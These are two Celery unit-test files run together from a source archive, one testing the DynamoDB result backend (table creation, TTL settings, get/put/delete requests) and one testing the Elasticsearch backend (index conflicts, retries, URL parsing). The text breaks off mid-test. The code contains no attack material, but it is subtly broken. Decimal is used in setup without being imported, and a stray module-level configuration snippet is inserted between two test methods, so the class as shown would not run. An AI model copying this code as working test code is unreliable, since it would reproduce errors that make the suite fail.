from unittest.mock import MagicMock, Mock, patch, sentinel

import pytest

from celery import states
from celery.backends import dynamodb as module
from celery.backends.dynamodb import DynamoDBBackend
from celery.exceptions import ImproperlyConfigured

pytest.importorskip('boto3')


class test_DynamoDBBackend:

    def setup(self):
        self._static_timestamp = Decimal(1483425566.52)
        self.app.conf.result_backend = 'dynamodb://'

    @property
    def backend(self):
        """:rtype: DynamoDBBackend"""
        return self.app.backend

    def test_init_no_boto3(self):
        prev, module.boto3 = module.boto3, None
        try:
            with pytest.raises(ImproperlyConfigured):
                DynamoDBBackend(app=self.app)
        finally:
            module.boto3 = prev

    def test_init_aws_credentials(self):
        with pytest.raises(ImproperlyConfigured):
            DynamoDBBackend(
                app=self.app,
                url='dynamodb://a:@'
            )

    def test_init_invalid_ttl_seconds_raises(self):
        with pytest.raises(ValueError):
            DynamoDBBackend(
                app=self.app,
                url='dynamodb://@?ttl_seconds=1d'
            )

    def test_get_client_explicit_endpoint(self):
        table_creation_path = \
            'celery.backends.dynamodb.DynamoDBBackend._get_or_create_table'
        with
patch('boto3.client') as mock_boto_client, \ patch(table_creation_path): self.app.conf.dynamodb_endpoint_url = 'http://my.domain.com:666' backend = DynamoDBBackend( app=self.app, url='dynamodb://@us-east-1' ) client = backend._get_client() assert backend.client is client mock_boto_client.assert_called_once_with( 'dynamodb', endpoint_url='http://my.domain.com:666', region_name='us-east-1' ) assert backend.endpoint_url == 'http://my.domain.com:666' def test_get_client_local(self): table_creation_path = \ 'celery.backends.dynamodb.DynamoDBBackend._get_or_create_table' with patch('boto3.client') as mock_boto_client, \ patch(table_creation_path): backend = DynamoDBBackend( app=self.app, url='dynamodb://@localhost:8000' ) client = backend._get_client() assert backend.client is client mock_boto_client.assert_called_once_with( 'dynamodb', endpoint_url='http://localhost:8000', region_name='us-east-1' ) assert backend.endpoint_url == 'http://localhost:8000' def test_get_client_credentials(self): table_creation_path = \ 'celery.backends.dynamodb.DynamoDBBackend._get_or_create_table' with patch('boto3.client') as mock_boto_client, \ patch(table_creation_path): backend = DynamoDBBackend( app=self.app, url='dynamodb://key:secret@test' ) client = backend._get_client() assert client is backend.client mock_boto_client.assert_called_once_with( 'dynamodb', aws_access_key_id='key', aws_secret_access_key='secret', region_name='test' ) assert backend.aws_region == 'test' @patch('boto3.client') @patch('celery.backends.dynamodb.DynamoDBBackend._get_or_create_table') @patch('celery.backends.dynamodb.DynamoDBBackend._validate_ttl_methods') @patch('celery.backends.dynamodb.DynamoDBBackend._set_table_ttl') def test_get_client_time_to_live_called( self, mock_set_table_ttl, mock_validate_ttl_methods, mock_get_or_create_table, mock_boto_client, ): backend = DynamoDBBackend( app=self.app, url='dynamodb://key:secret@test?ttl_seconds=30' ) backend._get_client() mock_validate_ttl_methods.assert_called_once() mock_set_table_ttl.assert_called_once() def test_get_or_create_table_not_exists(self): self.backend._client = MagicMock() mock_create_table = self.backend._client.create_table = MagicMock() mock_describe_table = self.backend._client.describe_table = \ MagicMock() mock_describe_table.return_value = { 'Table': { 'TableStatus': 'ACTIVE' } } self.backend._get_or_create_table() mock_create_table.assert_called_once_with( **self.backend._get_table_schema() ) def test_get_or_create_table_already_exists(self): from botocore.exceptions import ClientError self.backend._client = MagicMock() mock_create_table = self.backend._client.create_table = MagicMock() client_error = ClientError( { 'Error': { 'Code': 'ResourceInUseException', 'Message': 'Table already exists: {}'.format( self.backend.table_name ) } }, 'CreateTable' ) mock_create_table.side_effect = client_error mock_describe_table = self.backend._client.describe_table = \ MagicMock() mock_describe_table.return_value = { 'Table': { 'TableStatus': 'ACTIVE' } } self.backend._get_or_create_table() mock_describe_table.assert_called_once_with( TableName=self.backend.table_name ) def test_wait_for_table_status(self): self.backend._client = MagicMock() mock_describe_table = self.backend._client.describe_table = \ MagicMock() mock_describe_table.side_effect = [ {'Table': { 'TableStatus': 'CREATING' }}, {'Table': { 'TableStatus': 'SOME_STATE' }} ] self.backend._wait_for_table_status(expected='SOME_STATE') assert mock_describe_table.call_count == 2 def 
test_has_ttl_none_returns_none(self): self.backend.time_to_live_seconds = None assert self.backend._has_ttl() is None def test_has_ttl_lt_zero_returns_false(self): self.backend.time_to_live_seconds = -1 assert self.backend._has_ttl() is False def test_has_ttl_gte_zero_returns_true(self): self.backend.time_to_live_seconds = 30 assert self.backend._has_ttl() is True def test_validate_ttl_methods_present_returns_none(self): self.backend._client = MagicMock() assert self.backend._validate_ttl_methods() is None def test_validate_ttl_methods_missing_raise(self): self.backend._client = MagicMock() delattr(self.backend._client, 'describe_time_to_live') delattr(self.backend._client, 'update_time_to_live') with pytest.raises(AttributeError): self.backend._validate_ttl_methods() with pytest.raises(AttributeError): self.backend._validate_ttl_methods() def test_set_table_ttl_describe_time_to_live_fails_raises(self): from botocore.exceptions import ClientError self.backend.time_to_live_seconds = -1 self.backend._client = MagicMock() mock_describe_time_to_live = \ self.backend._client.describe_time_to_live = MagicMock() client_error = ClientError( { 'Error': { 'Code': 'Foo', 'Message': 'Bar', } }, 'DescribeTimeToLive' ) mock_describe_time_to_live.side_effect = client_error with pytest.raises(ClientError): self.backend._set_table_ttl() def test_set_table_ttl_enable_when_disabled_succeeds(self): self.backend.time_to_live_seconds = 30 self.backend._client = MagicMock() mock_update_time_to_live = self.backend._client.update_time_to_live = \ MagicMock() mock_describe_time_to_live = \ self.backend._client.describe_time_to_live = MagicMock() mock_describe_time_to_live.return_value = { 'TimeToLiveDescription': { 'TimeToLiveStatus': 'DISABLED', 'AttributeName': self.backend._ttl_field.name } } self.backend._set_table_ttl() mock_describe_time_to_live.assert_called_once_with( TableName=self.backend.table_name ) mock_update_time_to_live.assert_called_once() def test_set_table_ttl_enable_when_enabled_with_correct_attr_succeeds(self): self.backend.time_to_live_seconds = 30 self.backend._client = MagicMock() self.backend._client.update_time_to_live = MagicMock() mock_describe_time_to_live = \ self.backend._client.describe_time_to_live = MagicMock() mock_describe_time_to_live.return_value = { 'TimeToLiveDescription': { 'TimeToLiveStatus': 'ENABLED', 'AttributeName': self.backend._ttl_field.name } } self.backend._set_table_ttl() mock_describe_time_to_live.assert_called_once_with( TableName=self.backend.table_name ) def test_set_table_ttl_enable_when_currently_disabling_raises(self): from botocore.exceptions import ClientError self.backend.time_to_live_seconds = 30 self.backend._client = MagicMock() mock_update_time_to_live = self.backend._client.update_time_to_live = \ MagicMock() client_error = ClientError( { 'Error': { 'Code': 'ValidationException', 'Message': ( 'Time to live has been modified multiple times ' 'within a fixed interval' ) } }, 'UpdateTimeToLive' ) mock_update_time_to_live.side_effect = client_error mock_describe_time_to_live = \ self.backend._client.describe_time_to_live = MagicMock() mock_describe_time_to_live.return_value = { 'TimeToLiveDescription': { 'TimeToLiveStatus': 'DISABLING', 'AttributeName': self.backend._ttl_field.name } } with pytest.raises(ClientError): self.backend._set_table_ttl() def test_set_table_ttl_enable_when_enabled_with_wrong_attr_raises(self): from botocore.exceptions import ClientError self.backend.time_to_live_seconds = 30 self.backend._client = MagicMock() 
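# The mock below simulates DynamoDB rejecting UpdateTimeToLive because TTL is
# already enabled on a different attribute name; _set_table_ttl() is expected
# to surface that ClientError rather than swallow it, as asserted at the end
# of this test.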
mock_update_time_to_live = self.backend._client.update_time_to_live = \ MagicMock() wrong_attr_name = self.backend._ttl_field.name + 'x' client_error = ClientError( { 'Error': { 'Code': 'ValidationException', 'Message': ( 'TimeToLive is active on a different AttributeName: ' 'current AttributeName is {}' ).format(wrong_attr_name) } }, 'UpdateTimeToLive' ) mock_update_time_to_live.side_effect = client_error mock_describe_time_to_live = \ self.backend._client.describe_time_to_live = MagicMock() mock_describe_time_to_live.return_value = { 'TimeToLiveDescription': { 'TimeToLiveStatus': 'ENABLED', 'AttributeName': self.backend._ttl_field.name + 'x' } } with pytest.raises(ClientError): self.backend._set_table_ttl() def test_set_table_ttl_disable_when_disabled_succeeds(self): self.backend.time_to_live_seconds = -1 self.backend._client = MagicMock() self.backend._client.update_time_to_live = MagicMock() mock_describe_time_to_live = \ self.backend._client.describe_time_to_live = MagicMock() mock_describe_time_to_live.return_value = { 'TimeToLiveDescription': { 'TimeToLiveStatus': 'DISABLED' } } self.backend._set_table_ttl() mock_describe_time_to_live.assert_called_once_with( TableName=self.backend.table_name ) def test_set_table_ttl_disable_when_currently_enabling_raises(self): from botocore.exceptions import ClientError self.backend.time_to_live_seconds = -1 self.backend._client = MagicMock() mock_update_time_to_live = self.backend._client.update_time_to_live = \ MagicMock() client_error = ClientError( { 'Error': { 'Code': 'ValidationException', 'Message': ( 'Time to live has been modified multiple times ' 'within a fixed interval' ) } }, 'UpdateTimeToLive' ) mock_update_time_to_live.side_effect = client_error mock_describe_time_to_live = \ self.backend._client.describe_time_to_live = MagicMock() mock_describe_time_to_live.return_value = { 'TimeToLiveDescription': { 'TimeToLiveStatus': 'ENABLING', 'AttributeName': self.backend._ttl_field.name } } with pytest.raises(ClientError): self.backend._set_table_ttl() def test_prepare_get_request(self): expected = { 'TableName': 'celery', 'Key': {'id': {'S': 'abcdef'}} } assert self.backend._prepare_get_request('abcdef') == expected def test_prepare_put_request(self): expected = { 'TableName': 'celery', 'Item': { 'id': {'S': 'abcdef'}, 'result': {'B': 'val'}, 'timestamp': { 'N': str(Decimal(self._static_timestamp)) } } } with patch('celery.backends.dynamodb.time', self._mock_time): result = self.backend._prepare_put_request('abcdef', 'val') assert result == expected def test_prepare_put_request_with_ttl(self): ttl = self.backend.time_to_live_seconds = 30 expected = { 'TableName': 'celery', 'Item': { 'id': {'S': 'abcdef'}, 'result': {'B': 'val'}, 'timestamp': { 'N': str(Decimal(self._static_timestamp)) }, 'ttl': { 'N': str(int(self._static_timestamp + ttl)) } } } with patch('celery.backends.dynamodb.time', self._mock_time): result = self.backend._prepare_put_request('abcdef', 'val') assert result == expected def test_item_to_dict(self): boto_response = { 'Item': { 'id': { 'S': sentinel.key }, 'result': { 'B': sentinel.value }, 'timestamp': { 'N': Decimal(1) } } } converted = self.backend._item_to_dict(boto_response) assert converted == { 'id': sentinel.key, 'result': sentinel.value, 'timestamp': Decimal(1) } def test_get(self): self.backend._client = Mock(name='_client') self.backend._client.get_item = MagicMock() assert self.backend.get('1f3fab') is None self.backend.client.get_item.assert_called_once_with( Key={'id': {'S': '1f3fab'}}, TableName='celery' ) 
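# A minimal configuration sketch (illustrative only, not part of the test
# suite): the DynamoDB backend is selected purely through the result_backend
# URL, and the query string carries the table options exercised by
# test_backend_params_by_url below.  The credentials, region and table name
# here are placeholders.
from celery import Celery

app = Celery('sketch')
app.conf.result_backend = (
    'dynamodb://key:secret@us-east-1/celery_results'
    '?read=10'          # read_capacity_units
    '&write=20'         # write_capacity_units
    '&ttl_seconds=600'  # time_to_live_seconds; omit to leave TTL disabled
)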
def _mock_time(self): return self._static_timestamp def test_set(self): self.backend._client = MagicMock() self.backend._client.put_item = MagicMock() # should return None with patch('celery.backends.dynamodb.time', self._mock_time): assert self.backend._set_with_state(sentinel.key, sentinel.value, states.SUCCESS) is None assert self.backend._client.put_item.call_count == 1 _, call_kwargs = self.backend._client.put_item.call_args expected_kwargs = { 'Item': { 'timestamp': {'N': str(self._static_timestamp)}, 'id': {'S': str(sentinel.key)}, 'result': {'B': sentinel.value} }, 'TableName': 'celery' } assert call_kwargs['Item'] == expected_kwargs['Item'] assert call_kwargs['TableName'] == 'celery' def test_set_with_ttl(self): ttl = self.backend.time_to_live_seconds = 30 self.backend._client = MagicMock() self.backend._client.put_item = MagicMock() # should return None with patch('celery.backends.dynamodb.time', self._mock_time): assert self.backend._set_with_state(sentinel.key, sentinel.value, states.SUCCESS) is None assert self.backend._client.put_item.call_count == 1 _, call_kwargs = self.backend._client.put_item.call_args expected_kwargs = { 'Item': { 'timestamp': {'N': str(self._static_timestamp)}, 'id': {'S': str(sentinel.key)}, 'result': {'B': sentinel.value}, 'ttl': {'N': str(int(self._static_timestamp + ttl))}, }, 'TableName': 'celery' } assert call_kwargs['Item'] == expected_kwargs['Item'] assert call_kwargs['TableName'] == 'celery' def test_delete(self): self.backend._client = Mock(name='_client') mocked_delete = self.backend._client.delete = Mock('client.delete') mocked_delete.return_value = None # should return None assert self.backend.delete('1f3fab') is None self.backend.client.delete_item.assert_called_once_with( Key={'id': {'S': '1f3fab'}}, TableName='celery' ) def test_backend_by_url(self, url='dynamodb://'): from celery.app import backends from celery.backends.dynamodb import DynamoDBBackend backend, url_ = backends.by_url(url, self.app.loader) assert backend is DynamoDBBackend assert url_ == url def test_backend_params_by_url(self): self.app.conf.result_backend = ( 'dynamodb://@us-east-1/celery_results' '?read=10' '&write=20' '&ttl_seconds=600' ) assert self.backend.aws_region == 'us-east-1' assert self.backend.table_name == 'celery_results' assert self.backend.read_capacity_units == 10 assert self.backend.write_capacity_units == 20 assert self.backend.time_to_live_seconds == 600 assert self.backend.endpoint_url is None ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_elasticsearch.py0000664000175000017500000007752200000000000022131 0ustar00asifasif00000000000000import datetime from unittest.mock import Mock, call, patch, sentinel import pytest from billiard.einfo import ExceptionInfo from kombu.utils.encoding import bytes_to_str from celery import states try: from elasticsearch import exceptions except ImportError: exceptions = None from celery.app import backends from celery.backends import elasticsearch as module from celery.backends.elasticsearch import ElasticsearchBackend from celery.exceptions import ImproperlyConfigured _RESULT_RETRY = ( '{"status":"RETRY","result":' '{"exc_type":"Exception","exc_message":["failed"],"exc_module":"builtins"}}' ) _RESULT_FAILURE = ( '{"status":"FAILURE","result":' '{"exc_type":"Exception","exc_message":["failed"],"exc_module":"builtins"}}' ) pytest.importorskip('elasticsearch') class test_ElasticsearchBackend: def setup(self): self.backend = 
ElasticsearchBackend(app=self.app) def test_init_no_elasticsearch(self): prev, module.elasticsearch = module.elasticsearch, None try: with pytest.raises(ImproperlyConfigured): ElasticsearchBackend(app=self.app) finally: module.elasticsearch = prev def test_get(self): x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.get = Mock() # expected result r = {'found': True, '_source': {'result': sentinel.result}} x._server.get.return_value = r dict_result = x.get(sentinel.task_id) assert dict_result == sentinel.result x._server.get.assert_called_once_with( doc_type=x.doc_type, id=sentinel.task_id, index=x.index, ) def test_get_none(self): x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.get = Mock() x._server.get.return_value = sentinel.result none_result = x.get(sentinel.task_id) assert none_result is None x._server.get.assert_called_once_with( doc_type=x.doc_type, id=sentinel.task_id, index=x.index, ) def test_get_task_not_found(self): x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.get.side_effect = [ exceptions.NotFoundError(404, '{"_index":"celery","_type":"_doc","_id":"toto","found":false}', {'_index': 'celery', '_type': '_doc', '_id': 'toto', 'found': False}) ] res = x.get(sentinel.task_id) assert res is None def test_get_task_not_found_without_throw(self): x = ElasticsearchBackend(app=self.app) x._server = Mock() # this should not happen as if not found elasticsearch python library # will raise elasticsearch.exceptions.NotFoundError. x._server.get.return_value = {'_index': 'celery', '_type': '_doc', '_id': 'toto', 'found': False} res = x.get(sentinel.task_id) assert res is None def test_delete(self): x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.delete = Mock() x._server.delete.return_value = sentinel.result assert x.delete(sentinel.task_id) is None x._server.delete.assert_called_once_with( doc_type=x.doc_type, id=sentinel.task_id, index=x.index, ) def test_backend_by_url(self, url='elasticsearch://localhost:9200/index'): backend, url_ = backends.by_url(url, self.app.loader) assert backend is ElasticsearchBackend assert url_ == url @patch('celery.backends.elasticsearch.datetime') def test_index_conflict(self, datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) datetime_mock.utcnow.return_value = expected_dt x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}) ] x._server.get.return_value = { 'found': True, '_source': {"result": _RESULT_RETRY}, '_seq_no': 2, '_primary_term': 1, } x._server.update.return_value = { 'result': 'updated' } x._set_with_state(sentinel.task_id, sentinel.result, sentinel.state) assert x._server.get.call_count == 1 x._server.index.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}, params={'op_type': 'create'}, ) x._server.update.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'doc': {'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}}, params={'if_seq_no': 2, 'if_primary_term': 1} ) @patch('celery.backends.elasticsearch.datetime') def test_index_conflict_without_state(self, datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) datetime_mock.utcnow.return_value = expected_dt x = ElasticsearchBackend(app=self.app) x._server = Mock() 
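# The mocked server below raises ConflictError on the initial index() call
# (the document already exists), so the backend is expected to fall back to
# get() followed by a conditional update() guarded by if_seq_no and
# if_primary_term, which is exactly what the assertions at the end of this
# test check.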
x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}) ] x._server.get.return_value = { 'found': True, '_source': {"result": _RESULT_RETRY}, '_seq_no': 2, '_primary_term': 1, } x._server.update.return_value = { 'result': 'updated' } x.set(sentinel.task_id, sentinel.result) assert x._server.get.call_count == 1 x._server.index.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}, params={'op_type': 'create'}, ) x._server.update.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'doc': {'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}}, params={'if_seq_no': 2, 'if_primary_term': 1} ) @patch('celery.backends.elasticsearch.datetime') def test_index_conflict_with_ready_state_on_backend_without_state(self, datetime_mock): """Even if the backend already have a ready state saved (FAILURE in this test case) as we are calling ElasticsearchBackend.set directly, it does not have state, so it cannot protect overriding a ready state by any other state. As a result, server.update will be called no matter what. """ expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) datetime_mock.utcnow.return_value = expected_dt x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}) ] x._server.get.return_value = { 'found': True, '_source': {"result": _RESULT_FAILURE}, '_seq_no': 2, '_primary_term': 1, } x._server.update.return_value = { 'result': 'updated' } x.set(sentinel.task_id, sentinel.result) assert x._server.get.call_count == 1 x._server.index.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}, params={'op_type': 'create'}, ) x._server.update.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'doc': {'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}}, params={'if_seq_no': 2, 'if_primary_term': 1} ) @patch('celery.backends.elasticsearch.datetime') def test_index_conflict_with_existing_success(self, datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) datetime_mock.utcnow.return_value = expected_dt x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}) ] x._server.get.return_value = { 'found': True, '_source': { 'result': """{"status":"SUCCESS","result":42}""" }, '_seq_no': 2, '_primary_term': 1, } x._server.update.return_value = { 'result': 'updated' } x._set_with_state(sentinel.task_id, sentinel.result, sentinel.state) assert x._server.get.call_count == 1 x._server.index.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}, params={'op_type': 'create'}, ) x._server.update.assert_not_called() @patch('celery.backends.elasticsearch.datetime') def test_index_conflict_with_existing_ready_state(self, datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) datetime_mock.utcnow.return_value = expected_dt x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}) ] x._server.get.return_value = 
{ 'found': True, '_source': {"result": _RESULT_FAILURE}, '_seq_no': 2, '_primary_term': 1, } x._server.update.return_value = { 'result': 'updated' } x._set_with_state(sentinel.task_id, sentinel.result, states.RETRY) assert x._server.get.call_count == 1 x._server.index.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}, params={'op_type': 'create'}, ) x._server.update.assert_not_called() @patch('celery.backends.elasticsearch.datetime') @patch('celery.backends.base.datetime') def test_backend_concurrent_update(self, base_datetime_mock, es_datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) es_datetime_mock.utcnow.return_value = expected_dt expected_done_dt = datetime.datetime(2020, 6, 1, 18, 45, 34, 654321, None) base_datetime_mock.utcnow.return_value = expected_done_dt self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry x_server_get_side_effect = [ { 'found': True, '_source': {'result': _RESULT_RETRY}, '_seq_no': 2, '_primary_term': 1, }, { 'found': True, '_source': {'result': _RESULT_RETRY}, '_seq_no': 2, '_primary_term': 1, }, { 'found': True, '_source': {'result': _RESULT_FAILURE}, '_seq_no': 3, '_primary_term': 1, }, { 'found': True, '_source': {'result': _RESULT_FAILURE}, '_seq_no': 3, '_primary_term': 1, }, ] try: x = ElasticsearchBackend(app=self.app) task_id = str(sentinel.task_id) encoded_task_id = bytes_to_str(x.get_key_for_task(task_id)) result = str(sentinel.result) sleep_mock = Mock() x._sleep = sleep_mock x._server = Mock() x._server.index.side_effect = exceptions.ConflictError(409, "concurrent update", {}) x._server.get.side_effect = x_server_get_side_effect x._server.update.side_effect = [ {'result': 'noop'}, {'result': 'updated'} ] result_meta = x._get_result_meta(result, states.SUCCESS, None, None) result_meta['task_id'] = bytes_to_str(task_id) expected_result = x.encode(result_meta) x.store_result(task_id, result, states.SUCCESS) x._server.index.assert_has_calls([ call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' }, params={'op_type': 'create'} ), call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' }, params={'op_type': 'create'} ), ]) x._server.update.assert_has_calls([ call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'doc': { 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' } }, params={'if_seq_no': 2, 'if_primary_term': 1} ), call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'doc': { 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' } }, params={'if_seq_no': 3, 'if_primary_term': 1} ), ]) assert sleep_mock.call_count == 1 finally: self.app.conf.result_backend_always_retry = prev @patch('celery.backends.elasticsearch.datetime') @patch('celery.backends.base.datetime') def test_backend_index_conflicting_document_removed(self, base_datetime_mock, es_datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) es_datetime_mock.utcnow.return_value = expected_dt expected_done_dt = datetime.datetime(2020, 6, 1, 18, 45, 34, 654321, None) base_datetime_mock.utcnow.return_value = expected_done_dt self.app.conf.result_backend_always_retry, prev = True, 
self.app.conf.result_backend_always_retry try: x = ElasticsearchBackend(app=self.app) task_id = str(sentinel.task_id) encoded_task_id = bytes_to_str(x.get_key_for_task(task_id)) result = str(sentinel.result) sleep_mock = Mock() x._sleep = sleep_mock x._server = Mock() x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}), {'result': 'created'} ] x._server.get.side_effect = [ { 'found': True, '_source': {"result": _RESULT_RETRY}, '_seq_no': 2, '_primary_term': 1, }, exceptions.NotFoundError(404, '{"_index":"celery","_type":"_doc","_id":"toto","found":false}', {'_index': 'celery', '_type': '_doc', '_id': 'toto', 'found': False}), ] result_meta = x._get_result_meta(result, states.SUCCESS, None, None) result_meta['task_id'] = bytes_to_str(task_id) expected_result = x.encode(result_meta) x.store_result(task_id, result, states.SUCCESS) x._server.index.assert_has_calls([ call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' }, params={'op_type': 'create'} ), call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' }, params={'op_type': 'create'} ), ]) x._server.update.assert_not_called() sleep_mock.assert_not_called() finally: self.app.conf.result_backend_always_retry = prev @patch('celery.backends.elasticsearch.datetime') @patch('celery.backends.base.datetime') def test_backend_index_conflicting_document_removed_not_throwing(self, base_datetime_mock, es_datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) es_datetime_mock.utcnow.return_value = expected_dt expected_done_dt = datetime.datetime(2020, 6, 1, 18, 45, 34, 654321, None) base_datetime_mock.utcnow.return_value = expected_done_dt self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry try: x = ElasticsearchBackend(app=self.app) task_id = str(sentinel.task_id) encoded_task_id = bytes_to_str(x.get_key_for_task(task_id)) result = str(sentinel.result) sleep_mock = Mock() x._sleep = sleep_mock x._server = Mock() x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}), {'result': 'created'} ] x._server.get.side_effect = [ { 'found': True, '_source': {'result': _RESULT_RETRY}, '_seq_no': 2, '_primary_term': 1, }, {'_index': 'celery', '_type': '_doc', '_id': 'toto', 'found': False}, ] result_meta = x._get_result_meta(result, states.SUCCESS, None, None) result_meta['task_id'] = bytes_to_str(task_id) expected_result = x.encode(result_meta) x.store_result(task_id, result, states.SUCCESS) x._server.index.assert_has_calls([ call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' }, params={'op_type': 'create'} ), call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' }, params={'op_type': 'create'} ), ]) x._server.update.assert_not_called() sleep_mock.assert_not_called() finally: self.app.conf.result_backend_always_retry = prev @patch('celery.backends.elasticsearch.datetime') @patch('celery.backends.base.datetime') def test_backend_index_corrupted_conflicting_document(self, base_datetime_mock, es_datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) es_datetime_mock.utcnow.return_value = expected_dt expected_done_dt = 
datetime.datetime(2020, 6, 1, 18, 45, 34, 654321, None) base_datetime_mock.utcnow.return_value = expected_done_dt # self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry # try: x = ElasticsearchBackend(app=self.app) task_id = str(sentinel.task_id) encoded_task_id = bytes_to_str(x.get_key_for_task(task_id)) result = str(sentinel.result) sleep_mock = Mock() x._sleep = sleep_mock x._server = Mock() x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}) ] x._server.update.side_effect = [ {'result': 'updated'} ] x._server.get.return_value = { 'found': True, '_source': {}, '_seq_no': 2, '_primary_term': 1, } result_meta = x._get_result_meta(result, states.SUCCESS, None, None) result_meta['task_id'] = bytes_to_str(task_id) expected_result = x.encode(result_meta) x.store_result(task_id, result, states.SUCCESS) x._server.index.assert_called_once_with( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' }, params={'op_type': 'create'} ) x._server.update.assert_called_once_with( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'doc': { 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' } }, params={'if_primary_term': 1, 'if_seq_no': 2} ) sleep_mock.assert_not_called() def test_backend_params_by_url(self): url = 'elasticsearch://localhost:9200/index/doc_type' with self.Celery(backend=url) as app: x = app.backend assert x.index == 'index' assert x.doc_type == 'doc_type' assert x.scheme == 'http' assert x.host == 'localhost' assert x.port == 9200 def test_backend_url_no_params(self): url = 'elasticsearch:///' with self.Celery(backend=url) as app: x = app.backend assert x.index == 'celery' assert x.doc_type == 'backend' assert x.scheme == 'http' assert x.host == 'localhost' assert x.port == 9200 @patch('elasticsearch.Elasticsearch') def test_get_server_with_auth(self, mock_es_client): url = 'elasticsearch+https://fake_user:fake_pass@localhost:9200/index/doc_type' with self.Celery(backend=url) as app: x = app.backend assert x.username == 'fake_user' assert x.password == 'fake_pass' assert x.scheme == 'https' x._get_server() mock_es_client.assert_called_once_with( 'localhost:9200', http_auth=('fake_user', 'fake_pass'), max_retries=x.es_max_retries, retry_on_timeout=x.es_retry_on_timeout, scheme='https', timeout=x.es_timeout, ) @patch('elasticsearch.Elasticsearch') def test_get_server_without_auth(self, mock_es_client): url = 'elasticsearch://localhost:9200/index/doc_type' with self.Celery(backend=url) as app: x = app.backend x._get_server() mock_es_client.assert_called_once_with( 'localhost:9200', http_auth=None, max_retries=x.es_max_retries, retry_on_timeout=x.es_retry_on_timeout, scheme='http', timeout=x.es_timeout, ) def test_index(self): x = ElasticsearchBackend(app=self.app) x.doc_type = 'test-doc-type' x._server = Mock() x._server.index = Mock() expected_result = { '_id': sentinel.task_id, '_source': {'result': sentinel.result} } x._server.index.return_value = expected_result body = {"field1": "value1"} x._index( id=str(sentinel.task_id).encode(), body=body, kwarg1='test1' ) x._server.index.assert_called_once_with( id=str(sentinel.task_id), doc_type=x.doc_type, index=x.index, body=body, params={'op_type': 'create'}, kwarg1='test1' ) def test_index_bytes_key(self): x = ElasticsearchBackend(app=self.app) x.doc_type = 'test-doc-type' x._server = Mock() x._server.index = Mock() expected_result = { '_id': 
